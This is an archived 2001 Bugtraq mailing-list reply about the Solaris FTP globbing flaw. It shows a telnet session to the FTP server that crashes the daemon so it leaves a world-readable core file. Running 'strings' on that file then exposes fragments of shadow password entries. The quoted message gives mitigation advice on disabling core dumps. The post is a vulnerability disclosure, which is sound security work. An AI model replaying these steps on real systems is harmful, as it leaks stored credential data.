[20258] in bugtraq
Re: SUN SOLARIS 5.6/5.7 FTP Globbing Exploit !
daemon@ATHENA.MIT.EDU (Warning3)
Tue Apr 17 12:28:43 2001
Mime-Version: 1.0
Content-Type: text/plain; charset="GB2312"
Content-Transfer-Encoding: 7bit
Message-ID: <200104170654.OAA32455@intra.nsfocus.com>
Date: Tue, 17 Apr 2001 14:44:49 +0800
Reply-To: warning3@mail.com
From: Warning3 <warning3@mail.com>
To: BUGTRAQ@SECURITYFOCUS.COM
Yes. It is possible that local user can get the part of shadow file in
Solaris 2.6 since the core file is world readable.
[root@ /usr/sbin]> telnet localhost 21
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 sun26 FTP server (SunOS 5.6) ready.
user warning3
331 Password required for warning3. <-- a valid username
pass blahblah <--- a wrong password
530 Login incorrect.
CWD ~
530 Please login with USER and PASS.
Connection closed by foreign host.
[root@ /usr/sbin]> ls -l /core
-rw-r--r-- 1 root root 284304 Apr 16 10:20 /core
[root@ /usr/sbin]> strings /core|more
[...snip...]
lp:NP:6445::::::
P:64
eH::::
uucp:NP:6445:::
[...snip...]
---Original Message---
[...snip...]
>
>However, this can present other problems, so you should ensure that core
>dumps are disabled for inetd (add "ulimit -c 0" before starting inetd in
>/etc/init.d/inetsvc) or at least that they are not world readable (add a
>umask line); they are world readable by default under 2.6.
>
>--
> ghandi / ghandi@mindless.com / www.dopesquad.net
> "Bein' Crazy is the least of my worries." - Jack Kerouac
> C439 2B06 D8D2 A2D8 1ABB 0A55 A61D 9057 63F5 9B1F
Regards,
Warning3 <warning3@mail.com>
http://www.nsfocus.com
